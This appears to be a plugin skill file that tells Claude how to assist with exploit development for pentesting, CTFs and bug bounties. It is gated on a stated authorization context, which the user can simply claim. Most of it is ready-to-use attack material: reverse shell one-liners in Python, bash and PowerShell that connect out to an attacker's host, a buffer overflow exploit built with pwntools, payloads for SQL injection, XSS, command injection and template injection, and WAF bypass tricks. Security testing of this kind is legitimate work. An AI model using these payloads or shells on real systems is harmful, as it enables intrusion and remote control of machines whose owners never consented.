Stats
Actions
Tags
'%20stop-opacity%3D'0.16'%2F%3E%3Cstop%20offset%3D'1'%20stop-color%3D'rgb(200%2C90%2C60)'%20stop-opacity%3D'0.03'%2F%3E%3C%2FlinearGradient%3E%3C%2Fdefs%3E%3Crect%20width%3D'320'%20height%3D'200'%20fill%3D'url(%23g)'%2F%3E%3Ccircle%20cx%3D'250'%20cy%3D'56'%20r%3D'92'%20fill%3D'rgb(200%2C90%2C60)'%20fill-opacity%3D'0.06'%2F%3E%3Ccircle%20cx%3D'64'%20cy%3D'172'%20r%3D'58'%20fill%3D'rgb(200%2C90%2C60)'%20fill-opacity%3D'0.05'%2F%3E%3C%2Fsvg%3E)
From cybersecurity
Assists with authorized exploit development, PoC creation, payload engineering, and shellcode analysis for security testing, CTFs, and bug bounties.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersecurity:03-exploit-developmentThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
Enable Claude to assist security professionals with authorized exploit development, proof-of-concept creation, payload engineering, and vulnerability exploitation research. Every workflow in this skill requires confirmed authorization context before proceeding.
Enable Claude to assist security professionals with authorized exploit development, proof-of-concept creation, payload engineering, and vulnerability exploitation research. Every workflow in this skill requires confirmed authorization context before proceeding.
CRITICAL — AUTHORIZATION GATE: Before performing any task in this skill, Claude must confirm one of the following authorization contexts:
- Written penetration testing authorization (scope document, SOW, or rules of engagement)
- Bug bounty program scope (confirm target is in-scope)
- CTF competition (confirm challenge name and platform)
- Isolated lab environment the user owns
- Security research on software the user developed
If none of the above apply, Claude must decline and explain why.
This skill activates when the user asks about:
pip install pwntools keystone-engine capstone
Optional tools for authorized engagements:
pwntools — Binary exploitation frameworkmsfvenom — Metasploit payload generatorROPgadget — ROP chain discoveryGDB + GEF/PEDA/pwndbg — DebuggingBefore any exploit development task, Claude asks:
To proceed with exploit development, please confirm your authorization context:
1. What is the target system/software?
2. What is your authorization? (e.g., "pentest engagement with signed SOW",
"CTF challenge: [name]", "my own lab", "bug bounty — [program name]")
3. What is the scope or environment? (e.g., isolated VM, production network?)
Without clear authorization context, I cannot assist with active exploitation.
When the user asks to develop a PoC for a known CVE:
Standard PoC Template:
#!/usr/bin/env python3
"""
PoC for CVE-YYYY-XXXX: [Vulnerability Title]
Affected: [Software Name] [Affected Versions]
Fixed in: [Patched Version]
Type: [Vulnerability Class — e.g., Heap Buffer Overflow]
CVSS: [Score] ([Severity])
Author: [Your name] | Date: [Date]
DISCLAIMER: For authorized security testing and research only.
Unauthorized use is illegal and unethical.
Usage:
Check-only mode (safe): python poc.py --target host --check-only
Exploitation mode: python poc.py --target host --payload [payload]
"""
import argparse
import sys
def check_vulnerable(target: str) -> bool:
"""Detect vulnerability without exploitation. Safe to run."""
# [Detection logic — version check, response fingerprint, etc.]
pass
def exploit(target: str, payload: bytes) -> None:
"""Execute the exploitation chain. Requires authorization."""
# [Exploitation logic]
pass
def main():
parser = argparse.ArgumentParser(description="PoC for CVE-YYYY-XXXX")
parser.add_argument("--target", required=True, help="Target host:port")
parser.add_argument("--check-only", action="store_true",
help="Only check if target is vulnerable (safe mode)")
parser.add_argument("--payload", help="Payload to deliver")
args = parser.parse_args()
print("[*] Checking authorization: Ensure you have written permission for this target")
if args.check_only:
vulnerable = check_vulnerable(args.target)
print(f"[{'VULN' if vulnerable else 'SAFE'}] Target {'appears vulnerable' if vulnerable else 'does not appear vulnerable'}")
else:
if not args.payload:
print("[-] Payload required for exploitation mode")
sys.exit(1)
exploit(args.target, args.payload.encode())
if __name__ == "__main__":
main()
When the user asks to generate payloads (for authorized testing):
Reverse Shell Payloads (reference for authorized testing):
# Python (cross-platform)
python3 -c "import socket,subprocess,os;s=socket.socket();s.connect(('LHOST',LPORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(['/bin/sh'])"
# Bash
bash -i >& /dev/tcp/LHOST/LPORT 0>&1
# PowerShell (Windows)
powershell -nop -c "$client=New-Object Net.Sockets.TCPClient('LHOST',LPORT);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Use payload_generator.py for structured generation:
python scripts/payload_generator.py --type reverse_shell --os linux --arch x64 --lhost 10.0.0.1 --lport 4444
python scripts/payload_generator.py --type bind_shell --os windows --arch x86 --port 4444
python scripts/payload_generator.py --list-types
Payload Type Reference:
| Type | Description | Use Case |
|---|---|---|
| Reverse Shell | Initiates connection to attacker | Outbound firewall allowed |
| Bind Shell | Listens on target port | No egress filtering |
| Staged | Small stager + full payload | Size-constrained contexts |
| Web Shell | PHP/JSP/ASPX shells | Web server access |
| Meterpreter | Full-featured staged payload | Post-exploitation |
When the user asks about buffer overflow exploitation (authorized lab/CTF):
Fuzzing Phase — Find the crash input length:
# pwntools fuzzing
from pwn import *
p = process('./vuln_binary')
for n in range(100, 1000, 100):
p.sendline(b'A' * n)
if not p.poll():
print(f"Crash at {n} bytes")
break
Offset Discovery — Find exact EIP/RIP offset:
# Generate a cyclic pattern
python3 -c "from pwn import *; print(cyclic(500))"
# In GDB after crash: x/wx $esp → get value → cyclic_find(value)
Bad Character Identification — Find bytes that break the payload:
badchars = b"\x00" # null byte is almost always bad
# Test each byte 0x01-0xff in the payload
Return Address / Gadget Selection:
JMP ESP in executable memoryROPgadget --binary vulnExploit Construction:
from pwn import *
# Layout: [JUNK * offset] + [RET addr] + [NOP sled] + [shellcode]
offset = 112
ret_addr = p64(0x401234) # JMP RSP or gadget
nop_sled = b"\x90" * 16
shellcode = asm(shellcraft.sh()) # pwntools shellcode
payload = b"A" * offset + ret_addr + nop_sled + shellcode
When the user asks for web exploitation payloads (authorized testing):
SQL Injection Payloads:
-- Union-based (MySQL)
' UNION SELECT null,username,password FROM users-- -
-- Time-based blind (MySQL)
' AND SLEEP(5)-- -
-- Error-based (MySQL)
' AND extractvalue(1,concat(0x7e,(SELECT version())))-- -
-- Boolean blind
' AND 1=1-- - (true)
' AND 1=2-- - (false)
XSS Payloads:
// Basic reflected
<script>alert(document.domain)</script>
// Attribute context
" onmouseover="alert(1)
// Filter bypass (no script tag)
<img src=x onerror=alert(1)>
// DOM-based
#"><img src=x onerror=alert(1)>
Command Injection Payloads:
# Linux separators
; id
| id
&& id
`id`
$(id)
# Windows separators
& whoami
| whoami
SSTI Payloads:
# Jinja2 (Python)
{{7*7}} → 49 (confirms SSTI)
{{config.items()}} → app config
{{''.__class__.__mro__}} → class hierarchy for RCE
# Twig (PHP)
{{7*7}}
{{app.request.server.get('env')}}
When the user asks about AV/WAF evasion for authorized testing:
WAF Bypass Techniques:
sElEcT instead of SELECTSE/**/LECT%27 for single quote%2527/**/X-Forwarded-For, chunked encodingAV Evasion Concepts (for authorized red team operations):
All PoCs produced must include:
--check-only mode that detects without exploitingpayload_generator.pypython scripts/payload_generator.py --type reverse_shell --os linux --arch x64 --lhost 10.0.0.1 --lport 4444
python scripts/payload_generator.py --type bind_shell --os windows --arch x86 --port 4444
python scripts/payload_generator.py --list-types
| Condition | Next/Prior Skill |
|---|---|
| Vulnerability confirmed → build PoC | ← Skill 02 (Vulnerability Scanner) |
| Binary requires RE to find bug | ← Skill 04 (Reverse Engineering) |
| Deliver exploit in engagement | → Skill 14 (Red Team Operations) |
| Generate detection from exploit | → Skill 15 (Blue Team Defense) |
Authorization gate still applies — confirm written authorization / CTF or lab scope before any PoC work.
Modern mitigations a PoC must account for:
__malloc_hook removal in glibc 2.34+, House-of-* variants, UAF→type confusion) over classic unlink; state allocator + version assumptions.Precision rule: every PoC states target arch/OS/version, mitigations in effect, reliability estimate, and a defensive detection signature so blue teams can act on it.
npx claudepluginhub masriyan/claude-code-cybersecurity-skill --plugin cybersecurityGuides PoC exploit development for confirmed vulnerabilities in whitebox pentesting, with language recommendations, Python templates, and HTTP request patterns.
Leverages Metasploit Framework for authorized penetration testing, including exploitation, payload generation, and post-exploitation. For educational or authorized security assessments only.
Analyzes binary exploitation vulnerabilities such as buffer overflows and ROP chains using pwntools, checksec, and ROPgadget for CTF challenges and authorized security assessments.